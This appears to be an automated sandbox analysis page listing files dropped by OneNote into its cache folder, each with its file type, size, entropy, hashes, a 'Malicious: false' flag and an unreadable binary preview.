MD5:	F4F561E087BFAD2FDE0434FCEC020296
SHA1:	21022B795A348751F3C11AA1C8C841EEC64CAD50
SHA-256:	68AF73F15C93A06C26EE94B14F2A3B7AAA33F6E908FA5439A37A112DC41D092D
SHA-512:	A38A4B1A384ACD1885307E6E1226E8AA505EECC59681E06AB345B37CAF5BD0958715B3F33B5F58EF43BCAE46C281B20DAEB987DC65363EC11F71ED36E481AFB2
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>..........v...v............................I.......I.qk..B.....LZ>yU.....>yU.l........U.>yU.l........U.>yU..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............N..?(_..u.P......N...^................ .I..TB.1.I...m........f........................................I.qk..B.....LZ.............N..?(_..u.P...........N..?(_..u.P...........>yU.....>yU.....>yU.........................................>yUj....>yUT.]..>yU.....>yU..B..>yUH....>yU..B..>yU..>.)>yU..J...................;........4...4...4.."..............>yU.>yU.>yU..z...y.. x.. ...........$........4.....7*..7........................;........4...4...4.........>yU.....>yU....#>yU............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006M.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 171 x 552, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	10056
Entropy (8bit):	7.956064700093514
Encrypted:	false
SSDEEP:	192:edmu1fpj5DVHuooK4EpGLbAdT+dBXYBR8D1V2p6KwoPR6KUX9ojwRpgA:2Pp/B4LbAF+dBo/1E3S6JScpgA
MD5:	E1B57A8851177DD25DC05B50B904656A
SHA1:	96D2E31A325322F2720722973814D2CAED23D546
SHA-256:	2035407A0540E1C4F7934DB08BA4ADD750FCB9A62863DDD9553E7871C81A99E3
SHA-512:	BC7DC1201884E6DAFDC1F9D8E32656BFAEE0BB4905835E09B65299FE2D7C064B27EAA10B531F9BECF970C986E89A5FD8A0B83F508BBA34EB4E38B3F7F5FC623A
Malicious:	false
Preview:	.PNG........IHDR.......(.....!..t....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................4.....bKGD....H....cmPPJCmp0712....H.s...#.IDATx^.w`......$..B....... ....fz5..6`l\.8...Nsz{.//y./....{.7}g.....e.....~.......s...f.....%c...6....O.PJ...Y.oi...9..'j.2..6.-

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006N.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.336643876067841
Encrypted:	false
SSDEEP:	48:+mNIs8vlGMipx3/pOLxt0mKNDSPvEXh2aL7XwWn9DYoBrdqrQ7qUEvRX3D/5xkBu:bNIsPxhOLxSmKOEfHXwm9DYARyQsvYW
MD5:	526DFFD94F7F1CA8C2EC85EF1B232E37
SHA1:	B9E5BE29F9C85A64FA4BFD5283EED1447AD4A8AD
SHA-256:	6E00BE21010AA99A17CE0983EF018BC448F189C50BED6579A379B796D92A2826
SHA-512:	FFEFA033E6347D76CCB091CA7C6850316028B7FF47DB8A2C1E314D083718C4F11C4311AC71685E049ED0CBEFE5997E08F77C30A1064256C50397C153EC5052E6
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>..........v...v............................I.......I.qk..B.....LZ...........t].W..G .1.yA...t].W..G .1.yA.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................".G.......k....N...^.................].\|.O.07rgXB.........f........................................I.qk..B.....LZ...............".G.......k...........".G.......k........................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4.....7*..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006O.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:11:38], progressive, precision 8, 577x757, components 3
Category:	dropped
Size (bytes):	84097
Entropy (8bit):	7.78862495530604
Encrypted:	false
SSDEEP:	1536:cgHTEuD99rHwA5MSadIV2MApVmfJkAKOQ/Z1I7ngpDDyHfKFVITrU:HHjXidIhApV88/jIEmrU
MD5:	37EED97290E8ECB46A576C84F0810568
SHA1:	18D9FACB4CFA3CBF63B882CABCF30B203EDF4126
SHA-256:	140DD943D0F0CFE6AAA98470B7D1A7CB62CA02CB1D8F522DD2AC77433232EF41
SHA-512:	E0F57314C136211B8253EB2AC0093DED82198E7170D4F97C40D82FD4EC4123D2AAFE3EB4EBC3E7523C4DF4D77619408773871BDE15B6DC6C4049C71D5B9D4222
Malicious:	false
Preview:	......JFIF.....H.H.....hExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:11:38.............................A.......................................................&.(.................................2.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................z.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....b.xH......T..I...S.q.~..../s.R.x.....8.a..vE.5...-.G.A.4...._......$K..d.@NC.q....J.....>e".I.%...I0).R.I$........M3.F .

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006P.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.297895749486982
Encrypted:	false
SSDEEP:	48:nsHm87Wzgt71z/EMx0xIXShXxI9zEoe+rdqrJITRXBxz8J/L1:nsH+zgR9EvIXSTI9zEp+RycS
MD5:	D0ABD518A19FD6E811F8599C4711158C
SHA1:	89765FA0A79B2D398DE2C5CC132FF9454ED19D00
SHA-256:	78D8704350432465850531BD28761774F7BC754CD06680E9AF3310597415C28B
SHA-512:	59C5930029E3F942AE6D5D89200FEB398274E938CBCC5FD32EB32A8404AE0729D2AF31A4784CD85E58E51CE2B7C718649A194BC1BE9004E7545135B182082C8A
Malicious:	false
Preview:	2...>.......L...v...@...................................................................................................................................2...>...(.......v...t............................I.......I.qk..B.....LZ........pX..!7....i>..pX..!7....i>...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.................9...?$..........N...^.................."...M.....xl........f........................................I.qk..B.....LZ................9...?$..................9...?$......................................................................j.....T.]...........B...H.......B.....>.)...J...................;........4...4...4..".....................z...y.. x.. ...........$........4.....7..7........................;........4...4...4....................#.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006Q.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:26:15], progressive, precision 8, 216x792, components 3
Category:	dropped
Size (bytes):	64118
Entropy (8bit):	7.742974333356952
Encrypted:	false
SSDEEP:	1536:ORG4azGOKXzkEmR4bdRSbxONOoz0khbSb4J/5GZK5SWUlRwUYdv1M:ZXzGXzJdhRmgHfIb4J/5GZK5SWUldYdq
MD5:	864EEA0336F8628AE4A1ED46D4406807
SHA1:	CFCD7A751DFDBE52A20C03EE0C60FDFFA7A45B93
SHA-256:	7CE10D1EA660D2F9CF8B704F3FAB2966A4CE2627D9858D32C75D857095012098
SHA-512:	0CAA0C54C14571C279A75F0D5922F78A17803CF6EE1724D66819F7F5944C0F5B25CB586BB686A52808CDF2F8FEB3E4864052A914884054EF7DE44124A8CA951E
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:26:15.....................................................................................(.....................&...........s.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................#.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....NC+n....<.=.7..&.8A56..@^.Q..\\...E.>..".&G.......J .'....$.I)........0.../..mv...D....<v0=..ugc+..l.o...=.c.......x.&D..{`8...v

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006R.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.3170514881264745
Encrypted:	false
SSDEEP:	48:J8BswJsw+HiWxUtRrxXEphXOwx9gQz6oNrdqrvC58RX1p7ZZXnJ:GBsM2LxUlEHXD9/z68RyvxpX
MD5:	7039906CF7A78BCBA5227D2CD70DC93F
SHA1:	CF25FF51AFAC22681D38F17E065D71DD11C99BCF
SHA-256:	FE2D7E72370D11561543E7F164EC7B2192A225AD59AD66FDC71574A925B4375B
SHA-512:	5492531B971FC24D1AC05AF4BB2D8F8A6245EA96C47B9D1EA8DA25D9C48E477152FEF5D794D9AFAD99E365D9E49966F66DA48BC5585D29C4CC3DB10478ED0057
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>..........v...v........................................^Y.>C\|.....I.......I.qk..B.....LZ.....^Y.>C\|.........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.....................:..........N...^...............u.>\|B.{F.xd.Nd.........f........................................I.qk..B.....LZ....................:......................:..............................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4.....7..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006S.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:09:29], progressive, precision 8, 609x675, components 3
Category:	dropped
Size (bytes):	65998
Entropy (8bit):	7.671031449942883
Encrypted:	false
SSDEEP:	1536:klZtmExaFrtWgpc+Sg+DKeplHClpHfRtPMbe:VEWWl+SNDKqlH8p/vse
MD5:	B4F0A040890EE6F61EF8D9E094893C9C
SHA1:	303BCBA1D777B03BFD99CC01A48E0BB493C93E04
SHA-256:	1F81DDE3B42F23F0666D92EBF14D62893B31B39D72C07AEE070EAE28C2E6980E
SHA-512:	8F07E4D519F2FD001006BB34F7F8274B9AF9EC55367B88D41D24E5824FCE4354FD1290CE4735E43930829702ED53F41DF02C673904A7091E9354C28E029AD4EF
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:09:29.............................a.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..-O..s(...gO..@...[..+....+...H.'m........L.......@.......[k...S..O..p.'{X..3......]W..w.+.V....[.-.....2..i..i$.p.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006T.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	3.2673656279404355
Encrypted:	false
SSDEEP:	96:CsOB+2FylDN+WEc4q7X4Pm9Xtxq6OuKR0Pq/259d:Csu+24lDscxX4Pm9XtTO1R02259
MD5:	5DAC1DB4BB13F53E8094CA3E8AA8BD8B
SHA1:	50D1EA639BD12E15A4E819841234FE56BC0F8446
SHA-256:	8B64D28B7654A5514DE7DD22B0B9219E569E6F28E51CC22D263126EA7A94C383
SHA-512:	763276A79B6F5005647925602DEF6EB9403E54296779342D4F85BFCB4D38FFF496C488E6270BA18309A7CC15F5A3E57B0895DBC73E97201BAD228C27089A5A30
Malicious:	false
Preview:	2...>...........v.......................................................................................................................................2...>...j.......v................................I.......I.qk..B.....LZ.^.......^.d.A..<AZ.-.$..^.d.A..<AZ.-.$..^...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............$...O...5.9u....N...^...............~...G..A......I.........&...................................>....I.qk..B.....LZ..............$...O...5.9u..........$...O...5.9u..........^.......^.......^...........................................^.j.....^.T.a...^.......^...D...^.H.....^...N...^...?.#.^...9...................;........4...4...4.."...............^...^...^...z...y.. x.. ...........$........4.....7*..7...........Op.b..F.$..i.................;........4...4...4..........^.......^.....#.^.............................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006U.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	32656
Entropy (8bit):	3.9517299510231485
Encrypted:	false
SSDEEP:	384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
MD5:	DD4CA4BC0A73FCB71BEBAA3C29CB8F66
SHA1:	1A7085771D7941540EC94A1BD24D7CC8EA556D4B
SHA-256:	0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
SHA-512:	5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
Malicious:	false
Preview:	....l...r...1......^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+@..$..........?...........?.........@.......................}E

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006V.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12824
Entropy (8bit):	7.974776104184905
Encrypted:	false
SSDEEP:	384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
MD5:	2628353534C5AD86CBFE57B6616D46DD
SHA1:	244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
SHA-256:	69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
SHA-512:	2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
Malicious:	false
Preview:	.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.\|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a\|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[\|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......\|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.\|. ......EC..............1.\

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000070.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	32656
Entropy (8bit):	3.9517299510231485
Encrypted:	false
SSDEEP:	384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
MD5:	DD4CA4BC0A73FCB71BEBAA3C29CB8F66
SHA1:	1A7085771D7941540EC94A1BD24D7CC8EA556D4B
SHA-256:	0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
SHA-512:	5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
Malicious:	false
Preview:	....l...r...1......^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+@..$..........?...........?.........@.......................}E

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000071.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12824
Entropy (8bit):	7.974776104184905
Encrypted:	false
SSDEEP:	384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
MD5:	2628353534C5AD86CBFE57B6616D46DD
SHA1:	244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
SHA-256:	69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
SHA-512:	2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
Malicious:	false
Preview:	.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.\|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a\|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[\|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......\|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.\|. ......EC..............1.\

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000072.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	32656
Entropy (8bit):	3.9517299510231485
Encrypted:	false
SSDEEP:	384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
MD5:	DD4CA4BC0A73FCB71BEBAA3C29CB8F66
SHA1:	1A7085771D7941540EC94A1BD24D7CC8EA556D4B
SHA-256:	0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
SHA-512:	5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
Malicious:	false
Preview:	....l...r...1......^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+@..$..........?...........?.........@.......................}E

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000073.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12824
Entropy (8bit):	7.974776104184905
Encrypted:	false
SSDEEP:	384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
MD5:	2628353534C5AD86CBFE57B6616D46DD
SHA1:	244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
SHA-256:	69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
SHA-512:	2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
Malicious:	false
Preview:	.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.\|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a\|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[\|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......\|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.\|. ......EC..............1.\

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000074.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.3335726069341165
Encrypted:	false
SSDEEP:	48:Yu+s78pl5MMtO9y86Eya7+X4y39X2xjd8Srd3rlx9qB7RXW1nZZ:YRs4MMk9yPEyaiX4y39X2x6SRb1qty
MD5:	D9A7E74AFD4705071894ECB543F6C088
SHA1:	127CB641C53DBFE8497FA19E87DF14B58AAA7231
SHA-256:	871238C7741F968E9D152A5469F6C0A8063F9EDFBDD447C8B88E2F16860DD7BB
SHA-512:	3BA485E77DAE10B7371C6905A84931D35FDADF229B70F93E983B3B32853FE85B2E59307ABC6D69934D9E78A7E0CCEF3B8A80C990C617879D6CB55815CF2C63A6
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZXJ......XJ...C?.>.A.C...XJ...C?.>.A.C...XJ...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............,.+...2m..(..>....N...^...................A.=A.}............f........................................I.qk..B.....LZ.............,.+...2m..(..>.........,.+...2m..(..>.........XJ......XJ......XJ..........................................XJ.j....XJ.T.]..XJ......XJ...B..XJ.H....XJ...B..XJ...>.)XJ...J...................;........4...4...4.."..............XJ..XJ..XJ...z...y.. x.. ...........$........4.....7..7........................;........4...4...4.........XJ......XJ.....#XJ.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000075.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	39010
Entropy (8bit):	7.362726513389497
Encrypted:	false
SSDEEP:	768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
MD5:	9700DE02720CDB5A45EDE51F1A4647EC
SHA1:	CF72A73E1181719B1CC45C2FE0A6B619081E115E
SHA-256:	7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
SHA-512:	5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...\|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......\|]v....D..9.k.w.\|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.\|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000076.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.441307937687046
Encrypted:	false
SSDEEP:	48:zW2C0si+g3r6tq2uL7Er+eZLXSHL9OBDy6j4DZrd3r8xJDdX/gz2O7uy0:60s23r6E2uXExZLXcL98NwRbqDKzfuy
MD5:	1CA092700B69335A283DC63546C211FA
SHA1:	A4CB12CE5A4CF4B2ED8B7EF2DD461570757A55C1
SHA-256:	320D7D2C33B1EC9B4D4E71377DFDFB4C10471D14E59C379BA548245DB4B177AD
SHA-512:	51FE674E70D752CF5AFF8C143365C3B67A52C1389A22686AE9DA676FD523A02FA546AA5BB3651BF1FC924DCCBB4A63061FF92733C2A0A2E5F4712FD6DEA143C1
Malicious:	false
Preview:	2...>.......h...v...\...................................................................................................................................2...>...D.......v................................I.......I.qk..B.....LZ..Q.......Q%zp..'J..\....Q%zp..'J..\....Q..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................S..........{....N...^.................!....J....>.0........f........................................I.qk..B.....LZ...............S..........{...........S..........{...........Q.......Q.......Q...........................................Qj......QT.]....Q.......Q..B....QH......Q..B....Q..>.)..Q..J...................;........4...4...4.."................Q...Q...Q..z...y.. x.. ...........$........4...+..7+..7........................;........4...4...4...........Q.......Q....#..Q............................................

